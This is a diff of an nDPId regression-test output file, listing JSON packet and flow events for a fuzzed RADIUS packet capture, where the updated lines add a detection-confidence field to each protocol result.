 01262{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997395223,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1528997399308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997399308,"pkt":"ABRPJQDqcNuYVcUnCABFAADhALRAAPwRUxbG4hk1CgwlAAcUchAAzVpOC1QAxRxqj+ts\/zbuXZza\/XyA7U4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b1ZrLm9yZywgNWIyMiUAMTIvZjA6Nxk6NjA6ZDE6N2S6MzcvMjI0T0oBAgBIFwEAAAEFAAClYf4DzpLiqdyPyTgI99pYAgUAAG+BQKA0HAAAC9tSu9kUjAmLAQACCwUAANTPOn7BAwke3m06BT0FpdxQErKfyMWPNDJCfwFi2pzKF6M="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00721{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997399801,"pkt":"ABRP+4pTcNuYVcUnCAAbAAEwAL1AAPwRUr7G4hk1CgxAHgcUchABHDwbAlUBFM63G2\/ABME95vC\/YtPM3\/caCwAAV8gbBVNQQxpuAAABNxA0xuSFjY5XIJgFQGu0Uv0OYONLFS6YzD8pAXH0KZXHpfwyK4L\/92l5H6gqAq8nL0kepb8RNLxJYMKQCK0eGlYCRiBKtSavfrre3EDS6oPiPCuIZCCfvU44Ccl11WwK9jFxTgAolMtFATUwMzFPNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1DYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNjEyL2YwOjc5OjYwOmQxOjdkOjM3LzIyNFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBL2pfBK3Ll7exMTohpXZCAH"}
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1528997403593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997403593,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQxAAP8RAAAKDEBuxuIZNXIQBxQCxwAAAVYCv+kKLAd5QTZEtH35XGAZbVIaCgAAV8gOBMFTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqYbATUwMzExNDgwMDczNmM4MDcyQHdkYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQgLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzExMmE2MjI1YiwgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAEBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ZTAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1528997403841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997403841,"pkt":"ABRP+4rqUtuYVcUnCABFAADhAMdAAPwRUwNI4hk1CgxAHgcUchAAzZCBC1YAxcgsJl6LYV\/S6USqzg063n4BZDAzMTE0ODAwNzM2MzgwNzJAd01hbi55bmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0T0oBAgBIFwEAAAEFAADHRYXcoWwXwUZiNDAUiPZYAgUAAKf5M2Yd6gAAEyJCfEY39q2LAQACCwUAABPeNlqa\/2jA+R6oV5E\/laFQEt3nRw9TK906hgwY5FpY4\/w="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1528997257160,"flow_last_seen":1528997259951,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1528997257160,"flow_last_seen":1528997259951,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1528996996259,"flow_last_seen":1528997404349,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28106,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1528996996259,"flow_last_seen":1528997404349,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28106,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00559{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":600000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3}
 00560{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997476267,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3}
